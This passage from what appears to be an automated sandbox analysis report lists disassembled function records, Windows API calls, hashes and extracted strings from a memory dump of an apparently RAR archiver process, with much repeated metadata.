                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                • Instruction ID: b85b5ed19b8064ef16b4c2904c7c933ed832e6fb75c1295ea600b3270c24e20e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DED01765E3B92286F7048B41B84433013616F75399F610634F42CC45518FADA148A200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E4549
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                                • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                • Instruction ID: 3dd4b37b3a8a692cfccdf78ba0b2968377ac15c4580972720c696df76567c572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEC02B21E0188180C548573D98550341110BF54736FF00331F13E852F0CF1800EF0300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                • Instruction ID: a4a55a5928f912656c40744810f12b1e95da8f693dc439b1f93ed17ef4d73cfa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF0FF22A09A4244FB298B60E1503782650DB20B78F785730F23DC12D8DF3CD8D2C350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AEE9
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF01
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF19
                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF75
                                                                                                                                                                                                                                                • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AFB0
                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B23B
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B244
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B287
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                                • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                                • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                                • Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                                                                                                                                                                                                                • Instruction ID: 168faed0d73e99bf0470746afabe4d53a7f27b097bfd64994071b48fd607c213
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28C1AE32A29BA286EB24DF61F8502BE27A0FB64B94F644035FA4E87795DF3CD505D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Sleepswprintf
                                                                                                                                                                                                                                                • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                                                • API String ID: 407366315-3491873314
                                                                                                                                                                                                                                                • Opcode ID: 17cd7ac6b45fac6070adc0eed57ad23b885bbd446d6d7546a3a2cd6d53a87c8d
                                                                                                                                                                                                                                                • Instruction ID: a4e2a236ec60494ac0de88a58a6c2081809f026a803bd402bb57d658f93ca5ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17cd7ac6b45fac6070adc0eed57ad23b885bbd446d6d7546a3a2cd6d53a87c8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18022732B086A286EB21DF25E4646AE73A5FB987C4F600535FE5D8779ADE3DE440C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • new.LIBCMT ref: 00007FF60E5C4BD8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E60B6D0: Sleep.KERNEL32(?,?,?,?,00007FF60E5DCBED,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E60B730
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E1E80: CreateFileW.KERNELBASE ref: 00007FF60E5E1F4A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E1E80: GetLastError.KERNEL32 ref: 00007FF60E5E1F59
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E1E80: CreateFileW.KERNELBASE ref: 00007FF60E5E1F99
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E1E80: GetLastError.KERNEL32 ref: 00007FF60E5E1FA2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E1E80: SetFileTime.KERNEL32 ref: 00007FF60E5E1FF1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                                                • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                                                • API String ID: 2965465231-221484280
                                                                                                                                                                                                                                                • Opcode ID: e34f920fa60ea98e423a9e05b5cc19c384a7f8142988e5059d6ffbdfe646cb29
                                                                                                                                                                                                                                                • Instruction ID: 2f3fcf1e50422c1eac9cf28393c75fe91b5aebbf4a3b290d244c5cbcf7da837c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e34f920fa60ea98e423a9e05b5cc19c384a7f8142988e5059d6ffbdfe646cb29
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F1E062B09A628AEB22DB12E0706BE6761FB64B84F644C31FA4D87785DF3ED555C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                                • Instruction ID: 12a6c31cb9b09ab55e4015a023e8fe75842a9dd5f0bb43c2346b72ea306d1c0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB317F32628F9186EB60CF24F8402AE73A0FBA4794F640135FA9D83B59DF38D545CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                                                                                                • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                                • Instruction ID: 77a175d7925c9245a7d3cacfdf2a9d9e5814d0768deb591cd67db8692f06aaf1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6117232A2C75282E7908F61F45056AB3A5FB98B80F645436FA8E83628DF3CD008CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                                • Instruction ID: 308bbcd3f8547703952c8a6197181d0fa8c2b5fd85960b5fb08e67d201fc4973
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF41BA72A29F6589E704CF64F8417ED37A4EB28388F20413AFE9C87B94DE38D4259340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1039280553-0
                                                                                                                                                                                                                                                • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                                • Instruction ID: 2ce8c583b468924f4ae9319027a117402b715b3360f20d90dd8500973271c6b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221C225B2866393FA509F31F810179A364FBA9BA0F240131FE4A43764DE3DE44AD700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2092733347-0
                                                                                                                                                                                                                                                • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                                • Instruction ID: 188a453a39918c60f9373a9ddebcc6fd17a4e5b9d54eddb1d9f13e63dd837e36
